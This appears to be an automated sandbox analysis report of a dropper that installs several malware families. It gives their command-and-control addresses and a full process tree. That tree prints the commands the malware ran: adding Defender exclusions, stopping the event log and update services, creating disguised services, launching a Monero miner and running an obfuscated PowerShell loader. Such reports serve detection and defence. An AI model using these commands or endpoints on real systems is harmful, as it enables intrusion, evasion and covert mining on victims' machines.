Resubmissions

18-09-2024 16:12

240918-tnhy5a1cmp 10

16-08-2024 04:34

240816-e7ba3azckk 10

16-08-2024 04:25

240816-e14zssyhpq 10

16-08-2024 04:25

240816-e1x69ayhpk 3

15-08-2024 21:56

240815-1tbkka1fpq 10

15-08-2024 21:47

240815-1nkw2swfre 10

15-08-2024 21:46

240815-1m318s1cpr 3

15-08-2024 21:46

240815-1mkvnawflb 10

13-08-2024 22:28

240813-2dvtyazbph 10

25-06-2024 11:24

240625-nhwp5swhja 10

Analysis

  • max time kernel
    134s
  • max time network
    1801s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags
    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    24-06-2024 00:56

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Family

amadey

Version

4.31

Botnet

c43c2d

C2

http://o7labs.top

Attributes
  • install_dir

    28feeece5c

  • install_file

    Hkbsse.exe

  • strings_key

    db4823e211dffb31faf4fc1fd90d3289

  • url_paths

    /online/support/index.php

rc4.plain

Extracted

Family

redline

Botnet

AMA

C2

185.215.113.67:40960

Extracted

Family

loaderbot

C2

https://cv99160.tw1.ru/cmd.php

Extracted

Family

risepro

C2

77.91.77.66:58709

Extracted

Family

lumma

C2

https://disappointcredisotw.shop/api

https://publicitycharetew.shop/api

https://computerexcudesp.shop/api

https://leafcalfconflcitw.shop/api

https://injurypiggyoewirog.shop/api

https://bargainnygroandjwk.shop/api

https://doughtdrillyksow.shop/api

https://facilitycoursedw.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Gh0st RAT payload 7 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • LoaderBot executable 2 IoCs
  • XMRig Miner payload 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 27 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • UPX packed file 22 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 22 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 15 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 17 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:612
    • C:\Users\Admin\AppData\Local\Temp\a\0x3fg.exe
      "C:\Users\Admin\AppData\Local\Temp\a\0x3fg.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:4440
      • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
        "C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:1660
        • C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe
          "C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:1636
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:2900
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:1580
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:164
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:1444
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe delete "xjuumoinznsp"
            5⤵
            • Launches sc.exe
            PID:1204
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe create "xjuumoinznsp" binpath= "C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe" start= "auto"
            5⤵
            • Launches sc.exe
            PID:4464
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop eventlog
            5⤵
            • Launches sc.exe
            PID:3000
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe start "xjuumoinznsp"
            5⤵
            • Launches sc.exe
            PID:2692
    • C:\Users\Admin\AppData\Local\Temp\a\setup.exe
      "C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4308
      • C:\Users\Admin\AppData\Local\Temp\setup-1fbfaf8ef9c1de1d\setup.exe
        "C:\Users\Admin\AppData\Local\Temp\setup-1fbfaf8ef9c1de1d\setup.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of WriteProcessMemory
        PID:4236
        • C:\Windows\system32\winsvc.exe
          "C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\setup-1fbfaf8ef9c1de1d\setup.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2540
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:3720
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"
              6⤵
              • Launches sc.exe
              PID:4188
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:2408
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/0
              6⤵
              • Launches sc.exe
              PID:7772
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            PID:7852
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."
              6⤵
              • Launches sc.exe
              PID:10344
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            PID:9184
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" start winsvc
              6⤵
              • Launches sc.exe
              PID:5228
    • C:\Users\Admin\AppData\Local\Temp\a\taskweaker.exe
      "C:\Users\Admin\AppData\Local\Temp\a\taskweaker.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:4684
      • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        3⤵
          PID:5044
    • C:\Users\Admin\AppData\Local\Temp\a\ama.exe
      "C:\Users\Admin\AppData\Local\Temp\a\ama.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1144
      • C:\Users\Admin\AppData\Local\Temp\6.exe
        "C:\Users\Admin\AppData\Local\Temp\6.exe"
        3⤵
        PID:6464
    • C:\Users\Admin\AppData\Local\Temp\a\setup222.exe
      "C:\Users\Admin\AppData\Local\Temp\a\setup222.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4756
      • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
        SetupWizard.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3076
        • C:\Users\Admin\AppData\Local\Temp\SetupWizard-66b0c80010508c0a\SetupWizard.exe
          "C:\Users\Admin\AppData\Local\Temp\SetupWizard-66b0c80010508c0a\SetupWizard.exe"
          4⤵
          • Executes dropped EXE
          PID:3604
      • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
        SetupWizard.exe
        3⤵
        PID:4064
        • C:\Users\Admin\AppData\Local\Temp\SetupWizard-a590790cbb75dfa6\SetupWizard.exe
          "C:\Users\Admin\AppData\Local\Temp\SetupWizard-a590790cbb75dfa6\SetupWizard.exe"
          4⤵
          PID:11352
      • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
        SetupWizard.exe
        3⤵
        PID:6452
        • C:\Users\Admin\AppData\Local\Temp\SetupWizard-91ec399e47b4bf68\SetupWizard.exe
          "C:\Users\Admin\AppData\Local\Temp\SetupWizard-91ec399e47b4bf68\SetupWizard.exe"
          4⤵
          PID:8100
      • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
        SetupWizard.exe
        3⤵
        PID:2924
        • C:\Users\Admin\AppData\Local\Temp\SetupWizard-af7116e961952287\SetupWizard.exe
          "C:\Users\Admin\AppData\Local\Temp\SetupWizard-af7116e961952287\SetupWizard.exe"
          4⤵
          PID:10984
      • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
        SetupWizard.exe
        3⤵
        PID:9060
        • C:\Users\Admin\AppData\Local\Temp\SetupWizard-bb982e11ca6a2191\SetupWizard.exe
          "C:\Users\Admin\AppData\Local\Temp\SetupWizard-bb982e11ca6a2191\SetupWizard.exe"
          4⤵
          PID:12048
      • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
        SetupWizard.exe
        3⤵
        PID:3552
        • C:\Users\Admin\AppData\Local\Temp\SetupWizard-45815dea70755b24\SetupWizard.exe
          "C:\Users\Admin\AppData\Local\Temp\SetupWizard-45815dea70755b24\SetupWizard.exe"
          4⤵
          PID:12464
      • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
        SetupWizard.exe
        3⤵
        PID:3400
        • C:\Users\Admin\AppData\Local\Temp\SetupWizard-066aacd0a331ff1e\SetupWizard.exe
          "C:\Users\Admin\AppData\Local\Temp\SetupWizard-066aacd0a331ff1e\SetupWizard.exe"
          4⤵
          PID:8448
    • C:\Users\Admin\AppData\Local\Temp\a\FirstZ.exe
      "C:\Users\Admin\AppData\Local\Temp\a\FirstZ.exe"
      2⤵
      • Executes dropped EXE
      PID:2884
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:4944
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        3⤵
        PID:8604
        • C:\Windows\system32\wusa.exe
          wusa /uninstall /kb:890830 /quiet /norestart
          4⤵
          PID:10064
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:8592
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:8280
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop wuauserv
        3⤵
        • Launches sc.exe
        PID:8760
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop bits
        3⤵
        • Launches sc.exe
        PID:9980
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop dosvc
        3⤵
        • Launches sc.exe
        PID:9192
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        3⤵
        • Power Settings
        PID:9268
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        3⤵
        • Power Settings
        PID:8876
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        3⤵
        • Power Settings
        PID:9504
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        3⤵
        • Power Settings
        PID:8540
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe delete "WSNKISKT"
        3⤵
        • Launches sc.exe
        PID:5760
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
        3⤵
        • Launches sc.exe
        PID:7608
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop eventlog
        3⤵
        • Launches sc.exe
        PID:5300
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe start "WSNKISKT"
        3⤵
        • Launches sc.exe
        PID:5288
    • C:\Users\Admin\AppData\Local\Temp\a\pic1.exe
      "C:\Users\Admin\AppData\Local\Temp\a\pic1.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:232
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:944
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\rolex.exe
          rolex.exe -priverdD
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1832
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe"
            5⤵
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2568
            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3008
            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
              6⤵
              PID:15992
    • C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4192
      • C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
        "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:888
    • C:\Users\Admin\AppData\Local\Temp\a\pic15.exe
      "C:\Users\Admin\AppData\Local\Temp\a\pic15.exe"
      2⤵
      • Executes dropped EXE
      PID:2644
      • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        3⤵
        PID:8616
    • C:\Users\Admin\AppData\Local\Temp\a\limba.exe
      "C:\Users\Admin\AppData\Local\Temp\a\limba.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Checks whether UAC is enabled
      PID:1824
    • C:\Users\Admin\AppData\Local\Temp\a\ChatLife.exe
      "C:\Users\Admin\AppData\Local\Temp\a\ChatLife.exe"
      2⤵
      • Executes dropped EXE
      PID:1508
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd
        3⤵
        PID:4528
    • C:\Users\Admin\AppData\Local\Temp\a\1.exe
      "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      PID:4464
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 492
        3⤵
        • Program crash
        PID:4744
    • C:\Users\Admin\AppData\Local\Temp\a\gui.exe
      "C:\Users\Admin\AppData\Local\Temp\a\gui.exe"
      2⤵
      • Executes dropped EXE
      PID:4440
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -windowstyle hidden "$Uhyggestemninger=Get-Content 'C:\Users\Admin\AppData\Local\Kbmandslivenes110\jesuitical\colourama\Blaze.Udk';$Unyieldingly=$Uhyggestemninger.SubString(54584,3);.$Unyieldingly($Uhyggestemninger)"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:1072
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
          4⤵
          PID:1448
  • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
    C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
    1⤵
    • Executes dropped EXE
    PID:2280
  • C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe
    C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3716
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:808
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:2952
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:4596
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:3612
    • C:\Windows\explorer.exe
      explorer.exe
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:668
  • C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
    "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
      "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
      2⤵
      • Executes dropped EXE
      • Enumerates connected drives
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2424
  • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
    C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
    1⤵
    PID:7692
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    1⤵
    PID:10216
  • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                1⤵
                                                  PID:7584
                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                    2⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    PID:6256
                                                • C:\Windows\system32\winsvc.exe
                                                  C:\Windows\system32\winsvc.exe
                                                  1⤵
                                                    PID:5332
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:11148
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\Temp\""
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:10592
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-SETACTIVE" "8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:1792
                                                      • C:\Windows\system32\powercfg.exe
                                                        "C:\Windows\system32\powercfg.exe" -SETACTIVE 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
                                                        3⤵
                                                        • Power Settings
                                                        PID:1220
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-ac" "0"
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:12160
                                                      • C:\Windows\system32\powercfg.exe
                                                        "C:\Windows\system32\powercfg.exe" -change standby-timeout-ac 0
                                                        3⤵
                                                        • Power Settings
                                                        PID:5420
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-dc" "0"
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:11652
                                                      • C:\Windows\system32\powercfg.exe
                                                        "C:\Windows\system32\powercfg.exe" -change standby-timeout-dc 0
                                                        3⤵
                                                        • Power Settings
                                                        PID:4000
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-ac" "0"
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:4676
                                                  • C:\Windows\system32\browser_broker.exe
                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                    1⤵
                                                      PID:6728
                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                      1⤵
                                                        PID:11232
                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                        1⤵
                                                          PID:6328
                                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                          1⤵
                                                            PID:5524
                                                          • C:\Windows\system32\werfault.exe
                                                            werfault.exe /h /shared Global\79679cef34ec432a8d273fa4a6dfd81f /t 5540 /p 11232
                                                            1⤵
                                                              PID:7540
                                                            • C:\Windows\system32\werfault.exe
                                                              werfault.exe /h /shared Global\0e4798b19e104374ab8ef36155f4f152 /t 5272 /p 6328
                                                              1⤵
                                                                PID:6776
                                                              • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                1⤵
                                                                  PID:7736
                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                  1⤵
                                                                    PID:1068
                                                                  • C:\Windows\system32\werfault.exe
                                                                    werfault.exe /h /shared Global\8537df2d830a447a9d6e0e0495736320 /t 10744 /p 1068
                                                                    1⤵
                                                                      PID:7448
                                                                    • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                      1⤵
                                                                        PID:10404
                                                                      • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                        1⤵
                                                                          PID:12808
                                                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                          1⤵
                                                                            PID:7800
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
